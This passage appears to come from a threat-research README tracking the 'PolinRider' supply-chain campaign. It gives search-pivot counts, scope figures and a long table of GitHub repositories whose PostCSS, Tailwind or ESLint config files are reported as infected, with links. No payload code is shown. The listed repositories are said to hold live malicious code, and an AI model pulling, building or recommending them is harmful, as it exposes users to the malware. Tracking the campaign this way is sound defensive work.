    9"e9b53a7c-2342-4b15-b02d-bd8b8f6a03f9" (StakingGame template UUID)GitHub Code Search42
    10Sequential '8-stN' 1–200 enumeration (checking for unindexed sequential tags)Sourcegraph regex0 new
    Round 2 combined+215
    Total unique (both rounds + existing CSV)1,951
    Refinementtotal_count
    extension:js430
    extension:mjs676
    extension:cjs17
    extension:ts7
    extension:html1
    size:<50004
    size:5000..6000630
    size:6000..7000125
    size:7000..8000139
    size:8000..900056
    size:9000..1000036
    size:10000..50000112
    size:>5000012
    fork:true157 (excluded by default!)
    SourceUnique reposUnique owners
    Original Mar 8 publication675352
    affected_repos.csv (Mar 18 update)769399
    April 10 v3 master (5 pivots)1,556835
    April 11 round 2 (5 additional pivots)+215 net new+158 net new
    Union (true scope, Apr 11)1,9511,047
    FileDescription
    README.mdThis report
    polinrider-rides-again.mdFollow-up blog (Apr 11) covering the campaign growth, the TasksJacker / PolinRider merger, and the full end-to-end payload reverse engineering
    affected_repos.csvAffected repositories — organisations first, then users, each sorted by stars+forks descending. Note: as of 2026-04-11 this CSV contains 769 entries from the March 18 collection. The April 10–11 hunts added ~1,180 new repos that have not yet been merged into this CSV (they are tracked in reports/polinrider-master-v3-1556.tsv and reports/polinrider-round2-repos.txt). True known scope is 1,951 unique repos.
    affected_users.csvAffected owners — organisations first, then users, each sorted by followers descending. As of 2026-04-11 contains 399 entries; April hunt union is 1,047 owners.
    reports/polinrider-master-v3-1556.tsvApril 10 hunt master list: repo \t osm_status \t threat_id \t severity \t sources for all 1,556 repos found in the v3 hunt
    reports/polinrider-new-v3.tsvThe 705 repos newly added to OSM on 2026-04-10
    reports/polinrider-round2-repos.txtRound 2 clean master list (239 unique repos from the 5 new pivots)
    reports/polinrider-round2-submissions-2026-04-11.tsvThe 72 repos newly added to OSM on 2026-04-11 (round 2)
    reports/polinrider-scope-v3-2026-04-10.mdFull v3 scope report including refinement methodology and false-positive analysis
    reports/polinrider-submissions-2026-04-10.mdMass submission report for the 704 OSM threat reports filed on 2026-04-10
    reports/polinrider-scope-v3-2026-04-10.mdv3 scope report
    RepositoryStarsForksInfected File
    Codechef-VITC-Student-Chapter/Club-Integration-and-Management-Platform611postcss.config.mjs
    Victorola-coder/tewo96tailwind.config.js
    Kreliannn/Document-Request-System-FRONTEND81postcss.config.mjs
    Atik203/Scholar-Flow44postcss.config.mjs
    sparktechagency/Vap-shop-Front-End-70postcss.config.mjs
    Kreliannn/PDF-To-Reviewer-Quiz-FRONTEND70postcss.config.mjs
    coderkhalide/Anti-Detect-Browser24tailwind.config.js
    tanushbhootra576/Bionary-Website-Challenge-and-final42tailwind.config.js
    tanushbhootra576/collegeConnect51postcss.config.mjs
    Kreliannn/commision_portfolio60postcss.config.mjs
    OrganisationFollowersRepos Affected
    sparktechagency13012
    FSDTeam-SAA2112
    Softvence-Omega-Dev-Ninjas184
    Codechef-VITC-Student-Chapter171
    softvence-omega-future-stack114
    The-Extra-Project111
    etrainermis71
    tricodenetwork71
    Binary-Mindz61
    Gamage-Recruiters-40651
    UserFollowersRepos Affected
    coderkhalide3494
    finom1724
    Victorola-coder1211
    dhruvmalik007876
    saif72437572
    a-belard431
    Muhammadfaizanjanjua109391
    Nathanim1919385
    kanchana404333
    AKDebug-UX304
    #RepositoryOwnerOwner TypeStarsForksInfected FilesFile PathsDescriptionRepo URL
    1Codechef-VITC-Student-Chapter/Club-Integration-and-Management-PlatformCodechef-VITC-Student-ChapterOrganization6111Client/postcss.config.mjshttps://github.com/Codechef-VITC-Student-Chapter/Club-Integration-and-Management-Platform
    2sparktechagency/Vap-shop-Front-End-sparktechagencyOrganization701postcss.config.mjsVapeShopMaps – A B2B social and e-commerce platform connecting users, stores, brands, and wholesalers with real-time social features and advanced SEO optimization.https://github.com/sparktechagency/Vap-shop-Front-End-
    3MIS-Silekta/silekta-frontendMIS-SilektaOrganization131postcss.config.mjsThis is the frontend repository of the silekta company for the MIS module.https://github.com/MIS-Silekta/silekta-frontend
    4UzairOrganization/allTaskUzairOrganizationOrganization021postcss.config.mjshttps://github.com/UzairOrganization/allTask
    5FSDTeam-SAA/nico41278-frontendFSDTeam-SAAOrganization021postcss.config.mjshttps://github.com/FSDTeam-SAA/nico41278-frontend
    6FSDTeam-SAA/cstrat_frontendFSDTeam-SAAOrganization111postcss.config.mjshttps://github.com/FSDTeam-SAA/cstrat_frontend
    7SoftySkills/quiz_appSoftySkillsOrganization301postcss.config.mjshttps://github.com/SoftySkills/quiz_app
    8dawahanigeria-team/rayyan-serverdawahanigeria-teamOrganization301eslint.config.mjsRayyan App Serverhttps://github.com/dawahanigeria-team/rayyan-server
    9FSDTeam-SAA/sahara_53FSDTeam-SAAOrganization011postcss.config.mjsBuild a Story Time is an AI-powered platform that lets users create personalized storybooks using their own voice and faces as characters. It transforms storytelling into a magical, interactive, and deeply personal experience.https://github.com/FSDTeam-SAA/sahara_53
    10FSDTeam-SAA/lowready-frontendFSDTeam-SAAOrganization011postcss.config.mjshttps://github.com/FSDTeam-SAA/lowready-frontend
    11Addis-Career/FrontendAddis-CareerOrganization011postcss.config.mjshttps://github.com/Addis-Career/Frontend
    12etrainermis/mineduc-FormetrainermisOrganization011postcss.config.mjsEAC World Kiswahili Language Day Celebrations Forumhttps://github.com/etrainermis/mineduc-Form
    13FSDTeam-SAA/brazen-kitsFSDTeam-SAAOrganization011postcss.config.mjshttps://github.com/FSDTeam-SAA/brazen-kits
    14FSDTeam-SAA/Igghy-dashboardFSDTeam-SAAOrganization011postcss.config.mjshttps://github.com/FSDTeam-SAA/Igghy-dashboard
    15FlowBondTech/danz-miniappsFlowBondTechOrganization012danz-main/postcss.config.mjs | daily-danz/postcss.config.mjshttps://github.com/FlowBondTech/danz-miniapps
    16BrennansWave-com/brennanswaveBrennansWave-comOrganization011postcss.config.mjshttps://github.com/BrennansWave-com/brennanswave
    17FlowBondTech/danz-webFlowBondTechOrganization011postcss.config.mjshttps://github.com/FlowBondTech/danz-web
    18QualifyAI/qualify-frontendQualifyAIOrganization011postcss.config.mjshttps://github.com/QualifyAI/qualify-frontend
    19FSDTeam-SAA/ftfdesignco-backendFSDTeam-SAAOrganization011src/router/index.jshttps://github.com/FSDTeam-SAA/ftfdesignco-backend
    20Gamage-Recruiters-406/Rent_a_CarGamage-Recruiters-406Organization101frontend/postcss.config.mjshttps://github.com/Gamage-Recruiters-406/Rent_a_Car
    21Umbrelabs-Projects/ProcobizUmbrelabs-ProjectsOrganization101postcss.config.mjshttps://github.com/Umbrelabs-Projects/Procobiz
    22The-Extra-Project/Extra_surface_repoThe-Extra-ProjectOrganization101frontend/postcss.config.mjsdeployment version of the Laurent's version for Extra-surface.https://github.com/The-Extra-Project/Extra_surface_repo
    23Automobile-System/frontendAutomobile-SystemOrganization101postcss.config.mjshttps://github.com/Automobile-System/frontend
    24VplayProCrypto/mvp_vercelVplayProCryptoOrganization101tailwind.config.jsRepositiory of phase 1 mvphttps://github.com/VplayProCrypto/mvp_vercel
    25sparktechagency/nskustoms_custom_game_site-2.0sparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/nskustoms_custom_game_site-2.0
    26softvence-omega-future-stack/gameluke-frontendsoftvence-omega-future-stackOrganization001postcss.config.mjshttps://github.com/softvence-omega-future-stack/gameluke-frontend
    27NexumTechnologies/E-CommerceNexumTechnologiesOrganization001postcss.config.mjshttps://github.com/NexumTechnologies/E-Commerce
    28Umbrelabs-Projects/Hostella-superAdminUmbrelabs-ProjectsOrganization001postcss.config.mjsThis repo is for those who will register adminshttps://github.com/Umbrelabs-Projects/Hostella-superAdmin
    29FSDTeam-SAA/admin-dashboard-gmanFSDTeam-SAAOrganization001postcss.config.mjshttps://github.com/FSDTeam-SAA/admin-dashboard-gman
    30sparktechagency/protippz_websitesparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/protippz_website
    31FlowRMS/flow-connect-frontend-newFlowRMSOrganization001postcss.config.mjsFlowConnect Frontend Applicationhttps://github.com/FlowRMS/flow-connect-frontend-new
    32Anthem-InfoTech-Pvt-Ltd/dashboardsAnthem-InfoTech-Pvt-LtdOrganization001postcss.config.mjshttps://github.com/Anthem-InfoTech-Pvt-Ltd/dashboards
    33WeOwnAiAgents-Hackerhouse/WeOwnAiAgentWeOwnAiAgents-HackerhouseOrganization001postcss.config.mjsbuilding the ultimate orchestration agent orchestration platform which is sovereign, tokenomics driven and build for web3 community . Contribution for ethdenver hackathon.https://github.com/WeOwnAiAgents-Hackerhouse/WeOwnAiAgent
    34Karigar-App/KarigarKarigar-AppOrganization001packages/ui/postcss.config.mjshttps://github.com/Karigar-App/Karigar
    35sparktechagency/silicon-zisan-websitesparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/silicon-zisan-website
    36FSDTeam-SAA/hinkel-WebsiteFSDTeam-SAAOrganization001postcss.config.mjshttps://github.com/FSDTeam-SAA/hinkel-Website
    37FSDTeam-SAA/iwmsadvisorsFSDTeam-SAAOrganization001postcss.config.mjshttps://github.com/FSDTeam-SAA/iwmsadvisors
    38Umbrelabs-Projects/Hostella-adminUmbrelabs-ProjectsOrganization001postcss.config.mjsHostella admin platformhttps://github.com/Umbrelabs-Projects/Hostella-admin
    39Umbrelabs-Projects/Hostella-stuUmbrelabs-ProjectsOrganization001postcss.config.mjsHostella student hostel booking platformhttps://github.com/Umbrelabs-Projects/Hostella-stu
    40iwb25-412-vertex-prime/apigateway-v1iwb25-412-vertex-primeOrganization001userportal/postcss.config.mjsUser Portal + Management Layer | Quota management, Rule enforcement, API key validation.https://github.com/iwb25-412-vertex-prime/apigateway-v1
    41Cloudrika/cloudrika-webCloudrikaOrganization002packages/ui/postcss.config.mjs | apps/email-portal/next.config.mjshttps://github.com/Cloudrika/cloudrika-web
    42sparktechagency/consult_dashboardsparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/consult_dashboard
    43sparktechagency/jonowoods-websitesparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/jonowoods-website
    44Softvence-Omega-Dev-Ninjas/diaz-jupiter-marine-frontendSoftvence-Omega-Dev-NinjasOrganization001postcss.config.mjshttps://github.com/Softvence-Omega-Dev-Ninjas/diaz-jupiter-marine-frontend
    45sparktechagency/profitable-website-v2sparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/profitable-website-v2
    46musetax/Amus-femusetaxOrganization001postcss.config.mjshttps://github.com/musetax/Amus-fe
    47sparktechagency/faceAi-front-endsparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/faceAi-front-end
    48sparktechagency/any-job-dashboardsparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/any-job-dashboard
    49sparktechagency/anyjob-websparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/anyjob-web
    50softvence-omega-future-stack/lawalx_frontendsoftvence-omega-future-stackOrganization001postcss.config.mjshttps://github.com/softvence-omega-future-stack/lawalx_frontend
    51softvence-omega-future-stack/kilian-rodhe-last-softvence-omega-future-stackOrganization001postcss.config.mjshttps://github.com/softvence-omega-future-stack/kilian-rodhe-last-
    52WeOwnNetwork/EthDenver-submissionWeOwnNetworkOrganization001apps/web/postcss.config.mjsBuilding the #FedArch orchestration infra client with onchain agent registry. submission for ETHDenver 2026 hackathonhttps://github.com/WeOwnNetwork/EthDenver-submission
    53sparktechagency/betopia-websitesparktechagencyOrganization001postcss.config.mjshttps://github.com/sparktechagency/betopia-website
    54FlowRMSLabs/flowdemandwebsiteFlowRMSLabsOrganization001postcss.config.mjshttps://github.com/FlowRMSLabs/flowdemandwebsite
    55BhavikPatel-dreamz/wove-gift-portalBhavikPatel-dreamzOrganization001postcss.config.mjshttps://github.com/BhavikPatel-dreamz/wove-gift-portal
    56BhavikPatel-dreamz/DynamicDreamz-AIagent-DemosBhavikPatel-dreamzOrganization001postcss.config.mjshttps://github.com/BhavikPatel-dreamz/DynamicDreamz-AIagent-Demos
    57GARAGE-POS/nextjs_testGARAGE-POSOrganization001postcss.config.mjshttps://github.com/GARAGE-POS/nextjs_test
    58BhavikPatel-dreamz/HomeopathwayBhavikPatel-dreamzOrganization001postcss.config.mjsHomeopathwayhttps://github.com/BhavikPatel-dreamz/Homeopathway
    59digitalschool-tech/tech-staticdigitalschool-techOrganization001postcss.config.mjshttps://github.com/digitalschool-tech/tech-static
    60tricodenetwork/lock-uptricodenetworkOrganization001frontend/postcss.config.mjshttps://github.com/tricodenetwork/lock-up
    61Sahl-AI/sahl-ai-iframeSahl-AIOrganization001tailwind.config.jsThis contains the demo react app to test iframe approachhttps://github.com/Sahl-AI/sahl-ai-iframe
    62dawahanigeria-team/domainpingdawahanigeria-teamOrganization001frontend/tailwind.config.jshttps://github.com/dawahanigeria-team/domainping
    63shahid538org/microrealestateshahid538orgOrganization001webapps/landlord/tailwind.config.jshttps://github.com/shahid538org/microrealestate
    64orynth-dev/vite-shadcn-templateorynth-devOrganization001tailwind.config.jshttps://github.com/orynth-dev/vite-shadcn-template
    65FlowBondTech/egatorFlowBondTechOrganization001apps/web/tailwind.config.jsAIeGator - AI-powered event aggregation engine (ETHDenver via Luma)https://github.com/FlowBondTech/egator
    66sparktechagency/u_tee_hubsparktechagencyOrganization001tailwind.config.jshttps://github.com/sparktechagency/u_tee_hub
    67Enigma-Incorporated-Ltd/N0DE-WebsiteEnigma-Incorporated-LtdOrganization002tailwind.config.js | src/tailwind.config.jshttps://github.com/Enigma-Incorporated-Ltd/N0DE-Website
    68FSDTeam-SAA/AMES_Investment_newFSDTeam-SAAOrganization001tailwind.config.jshttps://github.com/FSDTeam-SAA/AMES_Investment_new
    69Frontier-tech-consulting/olas-mcp-application-workflowFrontier-tech-consultingOrganization001docs/tailwind.config.jsThis consist of the corresponding UI mockup workflow regarding the Olas ecosystem (for letting users run the MCP application for doing onchain interactions).https://github.com/Frontier-tech-consulting/olas-mcp-application-workflow
    70Softvence-Omega-Dev-Ninjas/vic_pec_server_appSoftvence-Omega-Dev-NinjasOrganization001eslint.config.mjshttps://github.com/Softvence-Omega-Dev-Ninjas/vic_pec_server_app
    71Softvence-Omega-Dev-Ninjas/jdadzok_serverSoftvence-Omega-Dev-NinjasOrganization001eslint.config.mjshttps://github.com/Softvence-Omega-Dev-Ninjas/jdadzok_server
    72Binary-Mindz/agimtula_serverBinary-MindzOrganization001eslint.config.mjshttps://github.com/Binary-Mindz/agimtula_server
    73Softvence-Omega-Dev-Ninjas/alvaaro-serverSoftvence-Omega-Dev-NinjasOrganization001eslint.config.mjshttps://github.com/Softvence-Omega-Dev-Ninjas/alvaaro-server
    74Softvence-Omega-Cyber-Monk/nishant-serverSoftvence-Omega-Cyber-MonkOrganization001eslint.config.mjshttps://github.com/Softvence-Omega-Cyber-Monk/nishant-server
    75softvence-omega-future-stack/huss-besoftvence-omega-future-stackOrganization001eslint.config.mjshttps://github.com/softvence-omega-future-stack/huss-be
    76BhavikPatel-dreamz/Products-filters-reactBhavikPatel-dreamzOrganization001src/App.jshttps://github.com/BhavikPatel-dreamz/Products-filters-react
    77Victorola-coder/tewoVictorola-coderUser961tailwind.config.jstewosimi boboyi, ebi n pamihttps://github.com/Victorola-coder/tewo
    78Atik203/Scholar-FlowAtik203User441apps/frontend/postcss.config.mjsScholarFlow is a SaaS platform designed for researchers, students, professors, and academic teams to Upload, organize, and review research papers with collections, annotations, search, and team collaboration in a shared research libraryhttps://github.com/Atik203/Scholar-Flow
    79Kreliannn/Document-Request-System-FRONTENDKreliannnUser811postcss.config.mjsA web-based system that allows residents to request barangay documents online without visiting the barangay hall. Residents can track their request status, receive email notifications, and view request history. The barangay admin can manage requests, update statuses, and track transaction history.https://github.com/Kreliannn/Document-Request-System-FRONTEND
    80coderkhalide/Anti-Detect-BrowsercoderkhalideUser241src/renderer/tailwind.config.jshttps://github.com/coderkhalide/Anti-Detect-Browser
    81WeerasingheMSC/ASMS_FrontendWeerasingheMSCUser141asms_frontend/postcss.config.mjsFull-stack Automobile Service Time Logging & Appointment System built with Next.js, TypeScript, TailwindCSS, and Ant Design for the frontend. Includes customer and employee portals, real-time service tracking, appointment booking, time logging, and containerized deployment.https://github.com/WeerasingheMSC/ASMS_Frontend
    82fsdteam8/n_Krypted-frontendfsdteam8User041postcss.config.mjshttps://github.com/fsdteam8/n_Krypted-frontend
    83tanushbhootra576/Bionary-Website-Challenge-and-finaltanushbhootra576User421bionary_website/tailwind.config.jshttps://github.com/tanushbhootra576/Bionary-Website-Challenge-and-final
    84Kreliannn/PDF-To-Reviewer-Quiz-FRONTENDKreliannnUser701postcss.config.mjsA web app that use Ai to turn pdf files into Q&A type Reviewer. user can customize the generated output before saving. User can Review and Take Customizable Quiz using that saved ai gererated Reviewerhttps://github.com/Kreliannn/PDF-To-Reviewer-Quiz-FRONTEND
    85tanushbhootra576/collegeConnecttanushbhootra576User511postcss.config.mjshttps://github.com/tanushbhootra576/collegeConnect
    86brown2020/ikigaifinderbrown2020User411postcss.config.mjshttps://github.com/brown2020/ikigaifinder
    87Kreliannn/commision_portfolioKreliannnUser601postcss.config.mjshttps://github.com/Kreliannn/commision_portfolio
    88coderkhalide/Trading-JournalcoderkhalideUser411postcss.config.mjsProfessional trading journal to track, analyze and improve your trading performance across different systems and timeframes.https://github.com/coderkhalide/Trading-Journal
    89tanushbhootra576/weathertanushbhootra576User411postcss.config.mjshackathon projecthttps://github.com/tanushbhootra576/weather
    90Kreliannn/student-passed-rate-analysis-frontendKreliannnUser501postcss.config.mjshttps://github.com/Kreliannn/student-passed-rate-analysis-frontend
    91Kreliannn/pharmacy-management-frontendKreliannnUser501postcss.config.mjshttps://github.com/Kreliannn/pharmacy-management-frontend
    92Kreliannn/Employee-management-frontendKreliannnUser501postcss.config.mjshttps://github.com/Kreliannn/Employee-management-frontend
    93Kreliannn/e-commerce-frontendKreliannnUser501postcss.config.mjshttps://github.com/Kreliannn/e-commerce-frontend
    94umarabid123/The_INTERNET_OF_AGENTS_HACKATHONumarabid123User121frontend/postcss.config.mjshttps://github.com/umarabid123/The_INTERNET_OF_AGENTS_HACKATHON
    95ahmadraza382/FinanceAiahmadraza382User311tailwind.config.jsFinance Ai Coachhttps://github.com/ahmadraza382/FinanceAi
    96tanushbhootra576/turbo-happinesstanushbhootra576User401postcss.config.mjshttps://github.com/tanushbhootra576/turbo-happiness
    97shaheeer-dev/sketchersshaheeer-devUser021postcss.config.mjshttps://github.com/shaheeer-dev/sketchers
    98tanushbhootra576/gametanushbhootra576User401postcss.config.mjshttps://github.com/tanushbhootra576/game
    99tanushbhootra576/GridSagatanushbhootra576User401postcss.config.mjshttps://github.com/tanushbhootra576/GridSaga
    100senulahesara/devkitsenulahesaraUser211postcss.config.mjsEssential tools, blazing-fast performance, and offline-ready features-built to streamline your workflow and keep you focused on what matters: writing great code.https://github.com/senulahesara/devkit
    101tanushbhootra576/week3-forms-and-inputstanushbhootra576User401postcss.config.mjshttps://github.com/tanushbhootra576/week3-forms-and-inputs
    102tanushbhootra576/PW-apptanushbhootra576User401postcss.config.mjshttps://github.com/tanushbhootra576/PW-app
    103tanushbhootra576/RESTROtanushbhootra576User401tailwind.config.jshttps://github.com/tanushbhootra576/RESTRO
    104tanushbhootra576/MoodSynctanushbhootra576User401App.jshttps://github.com/tanushbhootra576/MoodSync
    105Amanbanti/CapstoneAmanbantiUser111frontend/postcss.config.mjsThe Capstone Project is a culminating academic and practical experience for students in both the Software Engineering (SE) and Computer Science and Engineering (CSE) programs.https://github.com/Amanbanti/Capstone
    106ShifaLabs/shifaShifaLabsUser111postcss.config.mjsShefa is a web-based telemedicine platform that enables patients to consult verified doctors through real-time in-app video calls, receive digital prescriptions, and manage their healthcare remotely in a secure and professional environment. This is a deployable, production-grade system, not a demo or academic mock-up.https://github.com/ShifaLabs/shifa
    107SouravDn-p/mobile-canvas-nextjsSouravDn-pUser111postcss.config.mjsMobileCanvas is a modern, full-stack e-commerce platform focused on selling gadgets and mobile devices. Built with Next.js, Redux Toolkit, and MongoDB, it offers a secure, responsive, and seamless shopping experience for users and powerful management tools for admins.https://github.com/SouravDn-p/mobile-canvas-nextjs
    108RinSanom/IoTWebRinSanomUser111postcss.config.mjshttps://github.com/RinSanom/IoTWeb
    109kanchana404/Google-bussiness-api-Get-reviews-and-Reply-reviewskanchana404User111postcss.config.mjshttps://github.com/kanchana404/Google-bussiness-api-Get-reviews-and-Reply-reviews
    110Salman1205/MailAssistSalman1205User111postcss.config.mjsAI-powered customer support platform with Gmail integration, smart ticketing, automated responses, Shopify integration, and real-time team collaborationhttps://github.com/Salman1205/MailAssist
    111Yassin-Younis/bypass-in-app-browserYassin-YounisUser301next.config.mjsBypass in-app browsers from social media apps like Instagram, Facebook, TikTok, and more. Send users to their native browser when they click on your social media ads to improve engagement, accurate tracking, and boost conversions.https://github.com/Yassin-Younis/bypass-in-app-browser
    112Lithira-Silva/TrueClaim---ITPM-Lithira-SilvaUser201client/postcss.config.mjsTrueClaim — A smart claim management system developed as an ITPM project at SLIIT (Year 3, Semester 2). Built with the MERN stack to streamline and automate the insurance claim process with accuracy and efficiency.https://github.com/Lithira-Silva/TrueClaim---ITPM-
    113maaz-bin-hassan/sahoolat-web-newmaaz-bin-hassanUser201postcss.config.mjshttps://github.com/maaz-bin-hassan/sahoolat-web-new
    114Pramadu2001/ITPM_MODUSPramadu2001User011my-app/postcss.config.mjs3rd year 2nd semester Information and technology project management project which is MODUS learning platfromhttps://github.com/Pramadu2001/ITPM_MODUS
    115abimtad/upload_fileabimtadUser011postcss.config.mjshttps://github.com/abimtad/upload_file
    116anilgoswamistartbitsolutions/travel-platformanilgoswamistartbitsolutionsUser013sites/holidaydeals/postcss.config.mjs | travel_template/package/postcss.config.mjs | travel_template/old/postcss.config.mjshttps://github.com/anilgoswamistartbitsolutions/travel-platform
    117AhsanalyOfficial/ahsan_portfolioAhsanalyOfficialUser011postcss.config.mjshttps://github.com/AhsanalyOfficial/ahsan_portfolio
    118HevenDev/rmw-new-designHevenDevUser011postcss.config.mjshttps://github.com/HevenDev/rmw-new-design
    119anilgoswamistartbitsolutions/travel-payload-sitesanilgoswamistartbitsolutionsUser012sites/holidaydeals/postcss.config.mjs | sites/luxurytravels/postcss.config.mjshttps://github.com/anilgoswamistartbitsolutions/travel-payload-sites
    120dhruvmalik007/solana-colossum-hackathondhruvmalik007User012apps/web/postcss.config.mjs | packages/ui/postcss.config.mjsbuilding a prediction marketplace for the thematic investment platform for sustainable investment portfolioshttps://github.com/dhruvmalik007/solana-colossum-hackathon
    121Tiewasters99/AI_Law_WizardTiewasters99User011postcss.config.mjshttps://github.com/Tiewasters99/AI_Law_Wizard
    122coderkhalide/scalping-trading-toolscoderkhalideUser011postcss.config.mjsConfigure and grade your trading entries with weighted factors, individual factor grading, bonus points, and letter gradeshttps://github.com/coderkhalide/scalping-trading-tools
    123monazahmed/Agrismart-project-monazahmedUser011postcss.config.mjshttps://github.com/monazahmed/Agrismart-project-
    124Gowreesh-VT/SherlockITGowreesh-VTUser011postcss.config.mjshttps://github.com/Gowreesh-VT/SherlockIT
    125webprogramminghack/b3-practice-30webprogramminghackUser011postcss.config.mjshttps://github.com/webprogramminghack/b3-practice-30
    126Salman1205/Mail-Assist-CRMSalman1205User201postcss.config.mjshttps://github.com/Salman1205/Mail-Assist-CRM
    127AbdulwahidHusein/Shipper-chatAbdulwahidHuseinUser201frontend/postcss.config.mjshttps://github.com/AbdulwahidHusein/Shipper-chat
    128michelzappy/zappy-scratch-091225michelzappyUser011frontend/tailwind.config.jshttps://github.com/michelzappy/zappy-scratch-091225
    129Ali-Hamas/Learn_HubAli-HamasUser011frontend/tailwind.config.jsLearnHub - Multi-Instructor Learning Platform with FastAPI, React, MongoDB, Stripe Payments, and AI Tutorhttps://github.com/Ali-Hamas/Learn_Hub
    130VALENSAPP/coin_backendVALENSAPPUser011eslint.config.mjsBackend Repository.https://github.com/VALENSAPP/coin_backend
    131QaisarWaheed/Aluminum-POSQaisarWaheedUser011eslint.config.mjshttps://github.com/QaisarWaheed/Aluminum-POS
    132Abdulbasit219/UPSkaleAIAbdulbasit219User101postcss.config.mjsUP SKale AI APP for students (learner) and (Earners) (FYP Project)https://github.com/Abdulbasit219/UPSkaleAI
    133Satyam3002/nextauthSatyam3002User101postcss.config.mjshttps://github.com/Satyam3002/nextauth
    134ahmadraza382/Hospital-management-systemahmadraza382User101postcss.config.mjshttps://github.com/ahmadraza382/Hospital-management-system
    135AKDebug-UX/challengePRAKDebug-UXUser101postcss.config.mjshttps://github.com/AKDebug-UX/challengePR
    136Ruwanima/ella-south-star-frontendRuwanimaUser101postcss.config.mjshttps://github.com/Ruwanima/ella-south-star-frontend
    137ahmadraza382/Luxeurs-Shopping-Storeahmadraza382User101postcss.config.mjshttps://github.com/ahmadraza382/Luxeurs-Shopping-Store
    138ahmadraza382/Portfolioahmadraza382User101postcss.config.mjshttps://github.com/ahmadraza382/Portfolio
    139Ayesha-Siddiqui1234/katy-youth-hackathon-2025-dev-post-Ayesha-Siddiqui1234User101frontend/postcss.config.mjsour team participated in katy yoth hackathon 2025 and we are building a fully functional website weith integrated chatbot i would be something like career counselor which guide students for their career pathhttps://github.com/Ayesha-Siddiqui1234/katy-youth-hackathon-2025-dev-post-
    140WimpyvL/Zappy-Health-DashboardWimpyvLUser101postcss.config.mjshttps://github.com/WimpyvL/Zappy-Health-Dashboard
    141ifedolapoomoniyi/fleet-roboticsifedolapoomoniyiUser101postcss.config.mjshttps://github.com/ifedolapoomoniyi/fleet-robotics
    142muhammad-tahir-sultan/rehman-fyp-nextjs-multivendormuhammad-tahir-sultanUser101postcss.config.mjshttps://github.com/muhammad-tahir-sultan/rehman-fyp-nextjs-multivendor
    143vkrms/wizardvkrmsUser101postcss.config.mjsreact multi-step form training projecthttps://github.com/vkrms/wizard
    144Atik203/VocabPrepAtik203User101frontend/postcss.config.mjsA modern, focused web application to help you build and master English vocabulary through interactive learning, practice sessions, and progress tracking.https://github.com/Atik203/VocabPrep
    145web-ghoul/Portfolioweb-ghoulUser101postcss.config.mjsit is including my projects, my experiences, my certificates, my contact.https://github.com/web-ghoul/Portfolio
    146AbdulwahidHusein/ai-tools-directoryAbdulwahidHuseinUser101postcss.config.mjshttps://github.com/AbdulwahidHusein/ai-tools-directory
    147AhmadRazaKhokhar1/resturants-appAhmadRazaKhokhar1User101postcss.config.mjshttps://github.com/AhmadRazaKhokhar1/resturants-app
    148ishivamgaur/Ap-news-next-jsishivamgaurUser101postcss.config.mjsAP News is a Next.js–based news application that delivers categorized news content such as politics, sports, technology, entertainment, and live updates with fast performance, SEO optimization, and server-side rendering.https://github.com/ishivamgaur/Ap-news-next-js
    149amMubbasher/cleannami.ceenami-oldamMubbasherUser101postcss.config.mjshttps://github.com/amMubbasher/cleannami.ceenami-old
    150AbdulwahidHusein/crawler-dashboardAbdulwahidHuseinUser101postcss.config.mjshttps://github.com/AbdulwahidHusein/crawler-dashboard
    151SouravDn-p/RexAuctionSouravDn-pUser101tailwind.config.jsA real-time auction web application built for live bidding experiences, combining advanced features like instant updates, smart bidding, and real-time communication between users.https://github.com/SouravDn-p/RexAuction
    152AKDebug-UX/interactive-tv-appAKDebug-UXUser101tailwind.config.jshttps://github.com/AKDebug-UX/interactive-tv-app
    153usman-174/VidSparkusman-174User101client/tailwind.config.jshttps://github.com/usman-174/VidSpark
    154NatyJoseDie/proyecto-nginxNatyJoseDieUser101eslint.config.mjshttps://github.com/NatyJoseDie/proyecto-nginx
    155AKDebug-UX/DoneWithItAKDebug-UXUser101App.jshttps://github.com/AKDebug-UX/DoneWithIt
    156dhruvmalik007/forensics-boarddhruvmalik007User001postcss.config.mjshttps://github.com/dhruvmalik007/forensics-board
    157Rahulkumarhavit/ProStore-EcommerceRahulkumarhavitUser001postcss.config.mjshttps://github.com/Rahulkumarhavit/ProStore-Ecommerce
    158Bart3kL/shopify-componentsBart3kLUser001polaris-components/postcss.config.mjshttps://github.com/Bart3kL/shopify-components
    159mjatin-dev/logic-zephyrmjatin-devUser001postcss.config.mjshttps://github.com/mjatin-dev/logic-zephyr
    160umrasghar/heygen-demoumrasgharUser001postcss.config.mjshttps://github.com/umrasghar/heygen-demo
    161thanhdanh111/challengethanhdanh111User002Problem-2/postcss.config.mjs | Problem-3/postcss.config.mjshttps://github.com/thanhdanh111/challenge
    162hamza-nafasat/rentin-frontendhamza-nafasatUser001postcss.config.mjshttps://github.com/hamza-nafasat/rentin-frontend
    163rejoan121615/ClientOpsrejoan121615User001frontend/postcss.config.mjsClientOps is a full-stack internal operations dashboard designed for agencies and small businesses to manage clients, projects, team members, and workflows securely.https://github.com/rejoan121615/ClientOps
    164SouravDn-p/CMRSouravDn-pUser001postcss.config.mjshttps://github.com/SouravDn-p/CMR
    165EmanDeveloper/EasyTechEmanDeveloperUser001postcss.config.mjshttps://github.com/EmanDeveloper/EasyTech
    166addis-ale/25-5-clockaddis-aleUser001postcss.config.mjshttps://github.com/addis-ale/25-5-clock
    167MSCPerera/Job-Board-AppMSCPereraUser001job-board-app/postcss.config.mjshttps://github.com/MSCPerera/Job-Board-App
    168Nathanim1919/nextjs-projectNathanim1919User001postcss.config.mjshttps://github.com/Nathanim1919/nextjs-project
    169TimothyBabatu13/AegisHealth-SmartTimothyBabatu13User001aegis-health-smart/postcss.config.mjshttps://github.com/TimothyBabatu13/AegisHealth-Smart
    170Senti-fi/Senti.fiSenti-fiUser001frontend/postcss.config.mjshttps://github.com/Senti-fi/Senti.fi
    171Zentaurios/stable-monitorZentauriosUser001postcss.config.mjshttps://github.com/Zentaurios/stable-monitor
    172SouravDn-p/Frontend-taskSouravDn-pUser001postcss.config.mjshttps://github.com/SouravDn-p/Frontend-task
